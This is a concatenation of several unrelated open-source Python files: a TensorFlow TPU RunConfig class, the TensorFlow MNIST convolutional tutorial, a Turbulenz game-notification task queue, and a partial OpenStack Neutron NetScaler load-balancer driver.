class RunConfig(run_config_lib.RunConfig):
"""RunConfig with TPU support."""
def __init__(self,
tpu_config=None,
evaluation_master=None,
master=None,
**kwargs):
"""Constructs a RunConfig.
Args:
tpu_config: the TPUConfig that specifies TPU-specific configuration.
evaluation_master: a string. The address of the master to use for eval.
Defaults to master if not set.
master: a string. The address of the master to use for training.
**kwargs: keyword config parameters.
"""
super(RunConfig, self).__init__(**kwargs)
self._tpu_config = tpu_config or TPUConfig()
# If user sets master and/or evaluation_master explicilty, including empty
# string '', take it. Otherwise, take the values set by parent class.
if master is not None:
self._master = master
if evaluation_master is not None:
self._evaluation_master = evaluation_master
elif (not self._evaluation_master and
self.task_type != run_config_lib.TaskType.EVALUATOR):
# If the task type is EVALUATOR, it means some cluster manager sets the
# TF_CONFIG. In that case, we respect the configuration in TF_CONFIG.
#
# Otherwise, it means user executes the code without external cluster
# manager. For that, we optimize the user experience by setting
# evaluation_master to master, unless user overwrites it.
self._evaluation_master = self._master
@property
def evaluation_master(self):
return self._evaluation_master
@property
def master(self):
return self._master
@property
def tpu_config(self):
return self._tpu_config
def replace(self, **kwargs):
if 'tpu_config' not in kwargs:
return super(RunConfig, self).replace(**kwargs)
tpu_config = kwargs.pop('tpu_config')
new_instance = super(RunConfig, self).replace(**kwargs)
new_instance._tpu_config = tpu_config # pylint: disable=protected-access
return new_instance
def _get_tpu_job_name_from_tf_config():
"""Extracts the TPU job name from TF_CONFIG env variable."""
# TODO(xiejw): Extends this to support both TF_CONFIG env variable and cluster
# spec propagation.
tf_config = json.loads(os.environ.get(_TF_CONFIG_ENV, '{}'))
tpu_job_name = tf_config.get(_SERVICE_KEY, {}).get(_TPU_WORKER_JOB_NAME)
if tpu_job_name:
logging.info('Load TPU job name from TF_CONFIG: %s', tpu_job_name)
return tpu_job_name
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple, end-to-end, LeNet-5-like convolutional MNIST model example.
This should achieve a test error of 0.7%. Please keep this model as simple and
linear as possible, it is meant as a tutorial for simple convolutional models.
Run with --self_test on the command line to execute a short self-test.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import gzip
import os
import sys
import time
import numpy
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# CVDF mirror of http://yann.lecun.com/exdb/mnist/
SOURCE_URL = 'https://storage.googleapis.com/cvdf-datasets/mnist/'
WORK_DIRECTORY = 'data'
IMAGE_SIZE = 28
NUM_CHANNELS = 1
PIXEL_DEPTH = 255
NUM_LABELS = 10
VALIDATION_SIZE = 5000 # Size of the validation set.
SEED = 66478 # Set to None for random seed.
BATCH_SIZE = 64
NUM_EPOCHS = 10
EVAL_BATCH_SIZE = 64
EVAL_FREQUENCY = 100 # Number of steps between evaluations.
FLAGS = None
def data_type():
"""Return the type of the activations, weights, and placeholder variables."""
if FLAGS.use_fp16:
return tf.float16
else:
return tf.float32
def maybe_download(filename):
"""Download the data from Yann's website, unless it's already here."""
if not tf.gfile.Exists(WORK_DIRECTORY):
tf.gfile.MakeDirs(WORK_DIRECTORY)
filepath = os.path.join(WORK_DIRECTORY, filename)
if not tf.gfile.Exists(filepath):
filepath, _ = urllib.request.urlretrieve(SOURCE_URL + filename, filepath)
with tf.gfile.GFile(filepath) as f:
size = f.size()
print('Successfully downloaded', filename, size, 'bytes.')
return filepath
def extract_data(filename, num_images):
"""Extract the images into a 4D tensor [image index, y, x, channels].
Values are rescaled from [0, 255] down to [-0.5, 0.5].
"""
print('Extracting', filename)
with gzip.open(filename) as bytestream:
bytestream.read(16)
buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)
data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)
data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH
data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS)
return data
def extract_labels(filename, num_images):
"""Extract the labels into a vector of int64 label IDs."""
print('Extracting', filename)
with gzip.open(filename) as bytestream:
bytestream.read(8)
buf = bytestream.read(1 * num_images)
labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)
return labels
def fake_data(num_images):
"""Generate a fake dataset that matches the dimensions of MNIST."""
data = numpy.ndarray(
shape=(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS),
dtype=numpy.float32)
labels = numpy.zeros(shape=(num_images,), dtype=numpy.int64)
for image in xrange(num_images):
label = image % 2
data[image, :, :, 0] = label - 0.5
labels[image] = label
return data, labels
def error_rate(predictions, labels):
"""Return the error rate based on dense predictions and sparse labels."""
return 100.0 - (
100.0 *
numpy.sum(numpy.argmax(predictions, 1) == labels) /
predictions.shape[0])
def main(_):
if FLAGS.self_test:
print('Running self-test.')
train_data, train_labels = fake_data(256)
validation_data, validation_labels = fake_data(EVAL_BATCH_SIZE)
test_data, test_labels = fake_data(EVAL_BATCH_SIZE)
num_epochs = 1
else:
# Get the data.
train_data_filename = maybe_download('train-images-idx3-ubyte.gz')
train_labels_filename = maybe_download('train-labels-idx1-ubyte.gz')
test_data_filename = maybe_download('t10k-images-idx3-ubyte.gz')
test_labels_filename = maybe_download('t10k-labels-idx1-ubyte.gz')
# Extract it into numpy arrays.
train_data = extract_data(train_data_filename, 60000)
train_labels = extract_labels(train_labels_filename, 60000)
test_data = extract_data(test_data_filename, 10000)
test_labels = extract_labels(test_labels_filename, 10000)
# Generate a validation set.
validation_data = train_data[:VALIDATION_SIZE, ...]
validation_labels = train_labels[:VALIDATION_SIZE]
train_data = train_data[VALIDATION_SIZE:, ...]
train_labels = train_labels[VALIDATION_SIZE:]
num_epochs = NUM_EPOCHS
train_size = train_labels.shape[0]
# This is where training samples and labels are fed to the graph.
# These placeholder nodes will be fed a batch of training data at each
# training step using the {feed_dict} argument to the Run() call below.
train_data_node = tf.placeholder(
data_type(),
shape=(BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
train_labels_node = tf.placeholder(tf.int64, shape=(BATCH_SIZE,))
eval_data = tf.placeholder(
data_type(),
shape=(EVAL_BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
# The variables below hold all the trainable weights. They are passed an
# initial value which will be assigned when we call:
# {tf.global_variables_initializer().run()}
conv1_weights = tf.Variable(
tf.truncated_normal([5, 5, NUM_CHANNELS, 32], # 5x5 filter, depth 32.
stddev=0.1,
seed=SEED, dtype=data_type()))
conv1_biases = tf.Variable(tf.zeros([32], dtype=data_type()))
conv2_weights = tf.Variable(tf.truncated_normal(
[5, 5, 32, 64], stddev=0.1,
seed=SEED, dtype=data_type()))
conv2_biases = tf.Variable(tf.constant(0.1, shape=[64], dtype=data_type()))
fc1_weights = tf.Variable( # fully connected, depth 512.
tf.truncated_normal([IMAGE_SIZE // 4 * IMAGE_SIZE // 4 * 64, 512],
stddev=0.1,
seed=SEED,
dtype=data_type()))
fc1_biases = tf.Variable(tf.constant(0.1, shape=[512], dtype=data_type()))
fc2_weights = tf.Variable(tf.truncated_normal([512, NUM_LABELS],
stddev=0.1,
seed=SEED,
dtype=data_type()))
fc2_biases = tf.Variable(tf.constant(
0.1, shape=[NUM_LABELS], dtype=data_type()))
# We will replicate the model structure for the training subgraph, as well
# as the evaluation subgraphs, while sharing the trainable parameters.
def model(data, train=False):
"""The Model definition."""
# 2D convolution, with 'SAME' padding (i.e. the output feature map has
# the same size as the input). Note that {strides} is a 4D array whose
# shape matches the data layout: [image index, y, x, depth].
conv = tf.nn.conv2d(data,
conv1_weights,
strides=[1, 1, 1, 1],
padding='SAME')
# Bias and rectified linear non-linearity.
relu = tf.nn.relu(tf.nn.bias_add(conv, conv1_biases))
# Max pooling. The kernel size spec {ksize} also follows the layout of
# the data. Here we have a pooling window of 2, and a stride of 2.
pool = tf.nn.max_pool(relu,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
conv = tf.nn.conv2d(pool,
conv2_weights,
strides=[1, 1, 1, 1],
padding='SAME')
relu = tf.nn.relu(tf.nn.bias_add(conv, conv2_biases))
pool = tf.nn.max_pool(relu,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
# Reshape the feature map cuboid into a 2D matrix to feed it to the
# fully connected layers.
pool_shape = pool.get_shape().as_list()
reshape = tf.reshape(
pool,
[pool_shape[0], pool_shape[1] * pool_shape[2] * pool_shape[3]])
# Fully connected layer. Note that the '+' operation automatically
# broadcasts the biases.
hidden = tf.nn.relu(tf.matmul(reshape, fc1_weights) + fc1_biases)
# Add a 50% dropout during training only. Dropout also scales
# activations such that no rescaling is needed at evaluation time.
if train:
hidden = tf.nn.dropout(hidden, 0.5, seed=SEED)
return tf.matmul(hidden, fc2_weights) + fc2_biases
# Training computation: logits + cross-entropy loss.
logits = model(train_data_node, True)
loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=train_labels_node, logits=logits))
# L2 regularization for the fully connected parameters.
regularizers = (tf.nn.l2_loss(fc1_weights) + tf.nn.l2_loss(fc1_biases) +
tf.nn.l2_loss(fc2_weights) + tf.nn.l2_loss(fc2_biases))
# Add the regularization term to the loss.
loss += 5e-4 * regularizers
# Optimizer: set up a variable that's incremented once per batch and
# controls the learning rate decay.
batch = tf.Variable(0, dtype=data_type())
# Decay once per epoch, using an exponential schedule starting at 0.01.
learning_rate = tf.train.exponential_decay(
0.01, # Base learning rate.
batch * BATCH_SIZE, # Current index into the dataset.
train_size, # Decay step.
0.95, # Decay rate.
staircase=True)
# Use simple momentum for the optimization.
optimizer = tf.train.MomentumOptimizer(learning_rate,
0.9).minimize(loss,
global_step=batch)
# Predictions for the current training minibatch.
train_prediction = tf.nn.softmax(logits)
# Predictions for the test and validation, which we'll compute less often.
eval_prediction = tf.nn.softmax(model(eval_data))
# Small utility function to evaluate a dataset by feeding batches of data to
# {eval_data} and pulling the results from {eval_predictions}.
# Saves memory and enables this to run on smaller GPUs.
def eval_in_batches(data, sess):
"""Get all predictions for a dataset by running it in small batches."""
size = data.shape[0]
if size < EVAL_BATCH_SIZE:
raise ValueError("batch size for evals larger than dataset: %d" % size)
predictions = numpy.ndarray(shape=(size, NUM_LABELS), dtype=numpy.float32)
for begin in xrange(0, size, EVAL_BATCH_SIZE):
end = begin + EVAL_BATCH_SIZE
if end <= size:
predictions[begin:end, :] = sess.run(
eval_prediction,
feed_dict={eval_data: data[begin:end, ...]})
else:
batch_predictions = sess.run(
eval_prediction,
feed_dict={eval_data: data[-EVAL_BATCH_SIZE:, ...]})
predictions[begin:, :] = batch_predictions[begin - size:, :]
return predictions
# Create a local session to run the training.
start_time = time.time()
with tf.Session() as sess:
# Run all the initializers to prepare the trainable parameters.
tf.global_variables_initializer().run()
print('Initialized!')
# Loop through training steps.
for step in xrange(int(num_epochs * train_size) // BATCH_SIZE):
# Compute the offset of the current minibatch in the data.
# Note that we could use better randomization across epochs.
offset = (step * BATCH_SIZE) % (train_size - BATCH_SIZE)
batch_data = train_data[offset:(offset + BATCH_SIZE), ...]
batch_labels = train_labels[offset:(offset + BATCH_SIZE)]
# This dictionary maps the batch data (as a numpy array) to the
# node in the graph it should be fed to.
feed_dict = {train_data_node: batch_data,
train_labels_node: batch_labels}
# Run the optimizer to update weights.
sess.run(optimizer, feed_dict=feed_dict)
# print some extra information once reach the evaluation frequency
if step % EVAL_FREQUENCY == 0:
# fetch some extra nodes' data
l, lr, predictions = sess.run([loss, learning_rate, train_prediction],
feed_dict=feed_dict)
elapsed_time = time.time() - start_time
start_time = time.time()
print('Step %d (epoch %.2f), %.1f ms' %
(step, float(step) * BATCH_SIZE / train_size,
1000 * elapsed_time / EVAL_FREQUENCY))
print('Minibatch loss: %.3f, learning rate: %.6f' % (l, lr))
print('Minibatch error: %.1f%%' % error_rate(predictions, batch_labels))
print('Validation error: %.1f%%' % error_rate(
eval_in_batches(validation_data, sess), validation_labels))
sys.stdout.flush()
# Finally print the result!
test_error = error_rate(eval_in_batches(test_data, sess), test_labels)
print('Test error: %.1f%%' % test_error)
if FLAGS.self_test:
print('test_error', test_error)
assert test_error == 0.0, 'expected 0.0 test_error, got %.2f' % (
test_error,)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--use_fp16',
default=False,
help='Use half floats instead of full floats if True.',
action='store_true')
parser.add_argument(
'--self_test',
default=False,
action='store_true',
help='True if running a self test.')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| |
# Copyright (c) 2011-2013 Turbulenz Limited
import logging
LOG = logging.getLogger(__name__)
from collections import defaultdict
from os import access, R_OK, remove as remove_file, listdir
from os.path import join as join_path, normpath as norm_path
from threading import Lock
from time import time as get_time
from simplejson import JSONEncoder, JSONDecoder
from turbulenz_local.lib.exceptions import ApiException
# pylint: disable=F0401
import yaml
from yaml import YAMLError
from pylons import config
# pylint: enable=F0401
from turbulenz_local.tools import get_absolute_path, create_dir
# pylint: disable=C0103
_json_decoder = JSONDecoder()
_json_encoder = JSONEncoder()
# pylint: enable=C0103
REQUIRED_NOTIFICATION_KEYS = ['key', 'title']
class GameNotificationsUnsupportedException(Exception):
pass
class GameNotificationPathError(Exception):
pass
class GameNotificationTaskError(Exception):
pass
class GameNotificationSettingsError(Exception):
pass
class GameNotificationKeys(object):
def __init__(self, game):
self.game = game
self.abs_game_path = get_absolute_path(game.path)
try:
yaml_path = norm_path(get_absolute_path(join_path(game.path, 'gamenotifications.yaml')))
if not access(yaml_path, R_OK):
raise GameNotificationsUnsupportedException()
with open(unicode(yaml_path), 'r') as f:
notifications = {}
for n_key in yaml.load(f):
notifications[n_key['key']] = n_key
self._notifications = notifications
except (IOError, KeyError) as e:
LOG.error('Failed loading gamenotifications: %s', str(e))
raise ApiException('Failed loading gamenotifications.yaml file %s' % str(e))
def get_key(self, key):
return self._notifications.get(key)
def to_dict(self):
return self._notifications
def validate(self):
result = []
count = 0
for notification in self._notifications.values():
count += 1
errors = []
# collect keys that are missing from the badge or are not filled in
for key in REQUIRED_NOTIFICATION_KEYS:
if not notification.get(key):
errors.append('missing key: "%s"' % key)
identifier = notification.get('title', notification.get('key', 'Badge #%i' % count))
if errors:
result.append((identifier, {'errors': errors}))
return result
class GameNotificationKeysList(object):
notification_key_dict = {}
## do some lazy loading here
@classmethod
def load(cls, game):
keys = GameNotificationKeys(game)
cls.notification_key_dict[game.slug] = keys
return keys
@classmethod
def get(cls, game):
return cls.notification_key_dict.get(game.slug) or cls.load(game)
@classmethod
def reset(cls):
cls.notification_key_dict = {}
def _get_task_path(slug, recipient, notification_type, filename=None):
try:
path = config['notifications_db']
except KeyError:
raise GameNotificationsUnsupportedException('notifications_db path config variable not set')
path = join_path(path, slug, recipient, notification_type)
if not create_dir(path):
raise GameNotificationPathError('User GameNotification path \"%s\" could not be created.' % path)
if filename:
return get_absolute_path(join_path(path, filename))
else:
return path
def _load_tasks(slug, recipient, notification_type):
tasks = []
num_tasks_per_sender = defaultdict(lambda: 0)
task_ids = set()
task_path = _get_task_path(slug, recipient, notification_type)
for task_file in listdir(task_path):
file_path = join_path(task_path, task_file)
try:
with open(file_path, 'rb') as f:
json_dict = _json_decoder.decode(f.read())
task = GameNotificationTask(**json_dict)
task_ids.add(task.task_id)
tasks.append(task)
num_tasks_per_sender[task.sender] += 1
except (IOError, OSError, TypeError) as e:
LOG.error('Failed loading GameNotificationTask "%s": %s', file_path, str(e))
tasks.sort(key=lambda task: task.time)
return tasks, task_ids, num_tasks_per_sender
class GameNotificationTask(object):
"""
GameNotificationTask represents a notification as it sits in the waiting-queue before being sent (polled)
Here on the devserver it sits in a text-file in the userdata folder
"""
INSTANT = 'instant'
DELAYED = 'delayed'
LIMIT = {
INSTANT: 1,
DELAYED: 8
}
def __init__(self, slug, task_id, key, sender, recipient, msg, time):
self.task_id = task_id
self.slug = slug
self.key = key
self.sender = sender
self.recipient = recipient
self.msg = msg
self.time = time
@property
def notification_type(self):
if self.time:
return self.DELAYED
return self.INSTANT
def save(self):
try:
with open(self.get_path(), 'wb') as f:
f.write(_json_encoder.encode(self.__dict__))
except IOError, e:
e = 'Failed writing GameNotificationTask: %s' % str(e)
LOG.error(e)
raise GameNotificationTaskError(e)
def to_notification(self):
return {
'key': self.key,
'sender': self.sender,
'msg': self.msg,
'sent': self.time or get_time()
}
def get_path(self):
filename = str(self.task_id) + '.txt'
return _get_task_path(self.slug, self.recipient, self.notification_type, filename)
def remove(self):
remove_file(self.get_path())
class GameNotificationTaskList(object):
def __init__(self, slug, recipient):
object.__init__(self)
self._slug = slug
self._recipient = recipient
self._lock = Lock()
instant = GameNotificationTask.INSTANT
delayed = GameNotificationTask.DELAYED
instant_tasks, instant_task_ids, num_instant_tasks_per_sender = \
_load_tasks(slug, recipient, GameNotificationTask.INSTANT)
delayed_tasks, delayed_task_ids, num_delayed_tasks_per_sender = \
_load_tasks(slug, recipient, GameNotificationTask.DELAYED)
self._tasks = {
instant: instant_tasks,
delayed: delayed_tasks
}
self._task_ids = {
instant: instant_task_ids,
delayed: delayed_task_ids
}
self._num_tasks_per_sender = {
instant: num_instant_tasks_per_sender,
delayed: num_delayed_tasks_per_sender
}
def add_task(self, task):
notification_type = task.notification_type
sender = task.sender
if self._num_tasks_per_sender[notification_type][sender] >= task.LIMIT[notification_type]:
return False
with self._lock:
## save task to disk
task.save()
## and add it to the list. This looks stupid but is much more efficient than appending and re-sorting.
sendtime = task.time
index = 0
tasks = self._tasks[notification_type]
for index, old_task in enumerate(tasks):
if old_task.time > sendtime:
break
tasks.insert(index, task)
self._task_ids[notification_type].add(task.task_id)
self._num_tasks_per_sender[notification_type][sender] += 1
return True
def poll_latest(self):
current_time = get_time()
tasks = []
tasks_to_delete = []
for tasks_by_type in self._tasks.itervalues():
for task in tasks_by_type:
if current_time < task.time:
break
tasks.append(task.to_notification())
tasks_to_delete.append(task)
for task in tasks_to_delete:
self.remove_task(task)
return tasks
def cancel_notification_by_id(self, task_id):
for tasks_by_type in self._tasks.itervalues():
for task in tasks_by_type:
if task.task_id == task_id:
self.remove_task(task)
break
def cancel_notification_by_key(self, key):
for tasks_by_type in self._tasks.itervalues():
tasks_to_remove = [task for task in tasks_by_type if task.key == key]
for task in tasks_to_remove:
self.remove_task(task)
def cancel_all_notifications(self):
for task_type, tasks_by_type in self._tasks.iteritems():
for task in tasks_by_type:
task.remove()
self._tasks[task_type] = []
self._task_ids[task_type].clear()
self._num_tasks_per_sender[task_type].clear()
def cancel_all_pending_notifications(self):
current_time = get_time()
tasks_to_delete = []
for tasks_by_type in self._tasks.itervalues():
for task in tasks_by_type:
if current_time < task.time:
tasks_to_delete.append(task)
else:
break
for task in tasks_to_delete:
self.remove_task(task)
def has_task(self, task_id):
for task_ids in self._task_ids.itervalues():
if task_id in task_ids:
return True
return False
def remove_task(self, task):
notification_type = task.notification_type
self._tasks[notification_type].remove(task)
self._task_ids[notification_type].remove(task.task_id)
self._num_tasks_per_sender[notification_type][task.sender] -= 1
task.remove()
class GameNotificationTaskListManager(object):
gnt_lists = defaultdict(lambda: {})
@classmethod
def load(cls, game, recipient):
tasks = GameNotificationTaskList(game.slug, recipient)
cls.gnt_lists[game.slug][recipient] = tasks
return tasks
@classmethod
def get(cls, game, recipient):
try:
return cls.gnt_lists[game.slug][recipient]
except KeyError:
return cls.load(game, recipient)
@classmethod
def reset(cls):
cls.gnt_lists = {}
@classmethod
def add_task(cls, game, task):
tasklist = cls.get(game, task.recipient)
return tasklist.add_task(task)
@classmethod
def poll_latest(cls, game, recipient):
tasklist = cls.get(game, recipient)
return tasklist.poll_latest()
@classmethod
def cancel_notification_by_id(cls, game, task_id):
slug = game.slug
if slug in cls.gnt_lists:
for task_list in cls.gnt_lists[slug].itervalues():
if task_list.has_task(task_id):
task_list.cancel_notification_by_id(task_id)
return True
return False
@classmethod
def cancel_notification_by_key(cls, game, recipient, key):
cls.get(game, recipient).cancel_notification_by_key(key)
@classmethod
def cancel_all_notifications(cls, game, recipient):
cls.get(game, recipient).cancel_all_notifications()
@classmethod
def cancel_all_pending_notifications(cls, game, recipient):
cls.get(game, recipient).cancel_all_pending_notifications()
def _get_settings_path():
return norm_path(_get_task_path('', '', '', 'notificationsettings.yaml'))
def reset_game_notification_settings():
try:
yaml_path = _get_settings_path()
with open(unicode(yaml_path), 'wb') as f:
data = {
'email_setting': 1,
'site_setting': 1
}
yaml.safe_dump(data, f, default_flow_style=False)
except IOError as e:
s = 'Failed resetting gamenotifications.yaml file %s' % str(e)
LOG.error(s)
raise GameNotificationSettingsError(s)
def get_game_notification_settings():
yaml_path = _get_settings_path()
if not access(yaml_path, R_OK):
reset_game_notification_settings()
try:
with open(unicode(yaml_path), 'rb') as f:
data = yaml.load(f)
return {
'email_setting': int(data['email_setting']),
'site_setting': int(data['site_setting'])
}
except (IOError, KeyError, TypeError, ValueError, YAMLError) as e:
s = 'Failed loading notificationsettings.yaml file: %s' % str(e)
LOG.error(s)
raise GameNotificationSettingsError(s)
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 New Dream Network, LLC (DreamHost)
# Copyright 2013 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Mark McClain, DreamHost
# @author: Youcef Laribi, Citrix
import uuid
from oslo.config import cfg
from neutron.api.v2 import attributes
from neutron.common import constants as q_const
from neutron.common import exceptions as q_exc
from neutron.common import rpc as q_rpc
from neutron.db import agents_db
from neutron.db.loadbalancer import loadbalancer_db
from neutron.extensions import lbaas_agentscheduler
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import rpc
from neutron.openstack.common.rpc import proxy
from neutron.plugins.common import constants
from neutron.services.loadbalancer.drivers import abstract_driver
LOG = logging.getLogger(__name__)
ACTIVE_PENDING = (
constants.ACTIVE,
constants.PENDING_CREATE,
constants.PENDING_UPDATE
)
AGENT_SCHEDULER_OPTS = [
cfg.StrOpt('loadbalancer_pool_scheduler_driver',
default='neutron.services.loadbalancer.agent_scheduler'
'.ChanceScheduler',
help=_('Driver to use for scheduling '
'pool to a default loadbalancer agent')),
]
cfg.CONF.register_opts(AGENT_SCHEDULER_OPTS)
# topic name for this particular agent implementation
TOPIC_LOADBALANCER_DEVICE = 'q-lbaas-netscaler'
TOPIC_LOADBALANCER_AGENT = 'lbaas_netscaler_agent'
class LoadBalancerCallbacks(object):
RPC_API_VERSION = '1.0'
def __init__(self, plugin):
self.plugin = plugin
def create_rpc_dispatcher(self):
return q_rpc.PluginRpcDispatcher(
[self, agents_db.AgentExtRpcCallback(self.plugin)])
def pool_destroyed(self, context, pool_id=None, host=None):
"""Agent confirmation hook that a pool has been destroyed.
This method exists for subclasses to change the deletion
behavior.
"""
pass
def plug_vip_port(self, context, port_id=None, host=None):
if not port_id:
return
try:
port = self.plugin._core_plugin.get_port(
context,
port_id
)
except q_exc.PortNotFound:
msg = _('Unable to find port %s to plug.')
LOG.debug(msg, port_id)
return
port['admin_state_up'] = True
port['device_owner'] = 'neutron:' + constants.LOADBALANCER
port['device_id'] = str(uuid.uuid5(uuid.NAMESPACE_DNS, str(host)))
self.plugin._core_plugin.update_port(
context,
port_id,
{'port': port}
)
def unplug_vip_port(self, context, port_id=None, host=None):
if not port_id:
return
try:
port = self.plugin._core_plugin.get_port(
context,
port_id
)
except q_exc.PortNotFound:
msg = _('Unable to find port %s to unplug. This can occur when '
'the Vip has been deleted first.')
LOG.debug(msg, port_id)
return
port['admin_state_up'] = False
port['device_owner'] = ''
port['device_id'] = ''
try:
self.plugin._core_plugin.update_port(
context,
port_id,
{'port': port}
)
except q_exc.PortNotFound:
msg = _('Unable to find port %s to unplug. This can occur when '
'the Vip has been deleted first.')
LOG.debug(msg, port_id)
def update_pool_stats(self, context, pool_id=None, stats=None, host=None):
self.plugin.update_pool_stats(context, pool_id, data=stats)
class LoadBalancerAgentApi(proxy.RpcProxy):
"""Plugin side of plugin to agent RPC API."""
BASE_RPC_API_VERSION = '1.0'
# history
# 1.0 Initial version
# 1.1 Support agent_updated call
def __init__(self, topic):
super(LoadBalancerAgentApi, self).__init__(
topic, default_version=self.BASE_RPC_API_VERSION)
def create_vip(self, context, vip, netinfo, host):
return self.cast(
context,
self.make_msg('create_vip', vip=vip, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def update_vip(self, context, old_vip, vip, old_netinfo, netinfo, host):
return self.cast(
context,
self.make_msg('update_vip', old_vip=old_vip, vip=vip, old_netinfo=old_netinfo, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def delete_vip(self, context, vip, netinfo, host):
return self.cast(
context,
self.make_msg('delete_vip', vip=vip, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def create_pool(self, context, pool, netinfo, host):
return self.cast(
context,
self.make_msg('create_pool', pool=pool, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def update_pool(self, context, old_pool, pool, old_netinfo, netinfo, host):
return self.cast(
context,
self.make_msg('update_pool', old_pool=old_pool, pool=pool, old_netinfo=old_netinfo, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def delete_pool(self, context, pool, netinfo, host):
return self.cast(
context,
self.make_msg('delete_pool', pool=pool, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def create_member(self, context, member, netinfo, host):
return self.cast(
context,
self.make_msg('create_member', member=member, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def update_member(self, context, old_member, member, old_netinfo, netinfo, host):
return self.cast(
context,
self.make_msg('update_member', old_member=old_member, member=member,
old_netinfo=old_netinfo, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def delete_member(self, context, member, netinfo, host):
return self.cast(
context,
self.make_msg('delete_member', member=member, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def create_pool_health_monitor(self, context, health_monitor, pool_id, netinfo, host):
return self.cast(
context,
self.make_msg('create_pool_health_monitor', health_monitor=health_monitor, pool_id=pool_id,
netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def update_health_monitor(self, context, old_health_monitor,
health_monitor, pool_id, netinfo, host):
return self.cast(
context,
self.make_msg('update_health_monitor', old_health_monitor=old_health_monitor,
health_monitor=health_monitor, pool_id=pool_id, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def delete_pool_health_monitor(self, context, health_monitor, pool_id,
netinfo, host):
return self.cast(
context,
self.make_msg('delete_pool_health_monitor', health_monitor=health_monitor,
pool_id=pool_id, netinfo=netinfo),
topic='%s.%s' % (self.topic, host)
)
def agent_updated(self, context, admin_state_up, host):
return self.cast(
context,
self.make_msg('agent_updated',
payload={'admin_state_up': admin_state_up}),
topic='%s.%s' % (self.topic, host),
version='1.1'
)
class NetScalerPluginDriver(abstract_driver.LoadBalancerAbstractDriver):
def __init__(self, plugin):
self.agent_rpc = LoadBalancerAgentApi(TOPIC_LOADBALANCER_AGENT)
self.callbacks = LoadBalancerCallbacks(plugin)
self.conn = rpc.create_connection(new=True)
self.conn.create_consumer(
TOPIC_LOADBALANCER_DEVICE,
self.callbacks.create_rpc_dispatcher(),
fanout=False)
self.conn.consume_in_thread()
self.plugin = plugin
self.plugin.agent_notifiers.update(
{q_const.AGENT_TYPE_LOADBALANCER: self.agent_rpc})
self.pool_scheduler = importutils.import_object(
cfg.CONF.loadbalancer_pool_scheduler_driver)
def _get_vip_network_info(self, context, vip):
network_info = {}
subnet_id = vip['subnet_id']
subnet = self.plugin._core_plugin.get_subnet(context, subnet_id)
network_id = subnet['network_id']
network = self.plugin._core_plugin.get_network(context, network_id)
network_info['port_id'] = vip['port_id']
network_info['network_id'] = subnet['network_id']
network_info['subnet_id'] = subnet_id
if 'provider:network_type' in network:
network_info['network_type'] = network['provider:network_type']
if 'provider:segmentation_id' in network:
network_info['segmentation_id'] = network['provider:segmentation_id']
return network_info
def _get_pool_network_info(self, context, pool):
network_info = {}
subnet_id = pool['subnet_id']
subnet = self.plugin._core_plugin.get_subnet(context, subnet_id)
network_id = subnet['network_id']
network = self.plugin._core_plugin.get_network(context, network_id)
network_info['network_id'] = network_id
network_info['subnet_id'] = subnet_id
if 'provider:network_type' in network:
network_info['network_type'] = network['provider:network_type']
if 'provider:segmentation_id' in network:
network_info['segmentation_id'] = network['provider:segmentation_id']
return network_info
def _get_pools_on_subnet(self, context, tenant_id, subnet_id):
filter = {'subnet_id': [subnet_id], 'tenant_id': [tenant_id]}
pools = self.plugin.get_pools(context, filters=filter)
return pools
def _get_snatport_for_subnet(self, context, tenant_id, subnet_id):
name = '_lb-snatport-' + subnet_id
subnet = self.plugin._core_plugin.get_subnet(context, subnet_id)
network_id=subnet['network_id']
LOG.info(_("Filtering ports based on network_id=%s, tenant_id=%s, name=%s" %
(network_id, tenant_id, name)))
filter = {'network_id': [network_id], 'tenant_id': [tenant_id], 'name': [name]}
